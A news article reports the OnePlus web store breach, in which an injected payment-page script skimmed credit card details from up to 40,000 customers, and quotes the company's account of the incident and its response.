OnePlus recently received reports from customers that fraudulent purchases were appearing on their credit card statements after making a purchase from the official OnePlus website. As we reported a few days ago, the complaints came from numerous sources including Reddit and OnePlus' official forums.
Though we noted at the time that these issues didn't appear to be widespread (a OnePlus forum poll found that only 63 customers were affected at the time), it seems that the opposite is true. After investigating the matter, OnePlus has confirmed in a separate forum post that "up to [40,000] users at oneplus.net may be affected" by the credit card breach.
In the post, a OnePlus staff member explained the situation:
"One of our systems was attacked, and a malicious script was injected into the payment page code to sniff out credit card info while it was being entered.
- The malicious script operated intermittently, capturing and sending data directly from the user's browser. It has since been eliminated.
- We have quarantined the infected server and reinforced all relevant system structures."
While OnePlus has only said that credit card information has been stolen thus far, the issue could go even further than that. It's possible that names and personal addresses have also been exposed, as "all the data from the first page of the checkout gets submitted in the same request," according to Andrew Mabbit, founder of Fidus.
OnePlus claims the breach has only affected users who purchased from the OnePlus store via a credit card between "mid-November and January 11, 2018." Users who purchased items via PayPal, a saved credit card or a credit card used via PayPal should not have been affected by the incident.
"We are in contact with potentially affected customers. We are working with our providers and local authorities to better address the incident," a staff member said. "We are also working with our current payment providers to implement a more secure credit card payment method, as well as conducting an in-depth security audit. All these measures will help us prevent such incidents from happening in the future."
Moving forward, OnePlus recommends that all of their customers check their credit card statements for fraudulent purchases and inform their respective banks of any transactions that seem fishy. Furthermore, the company has suspended all credit card transactions until the issue has been resolved.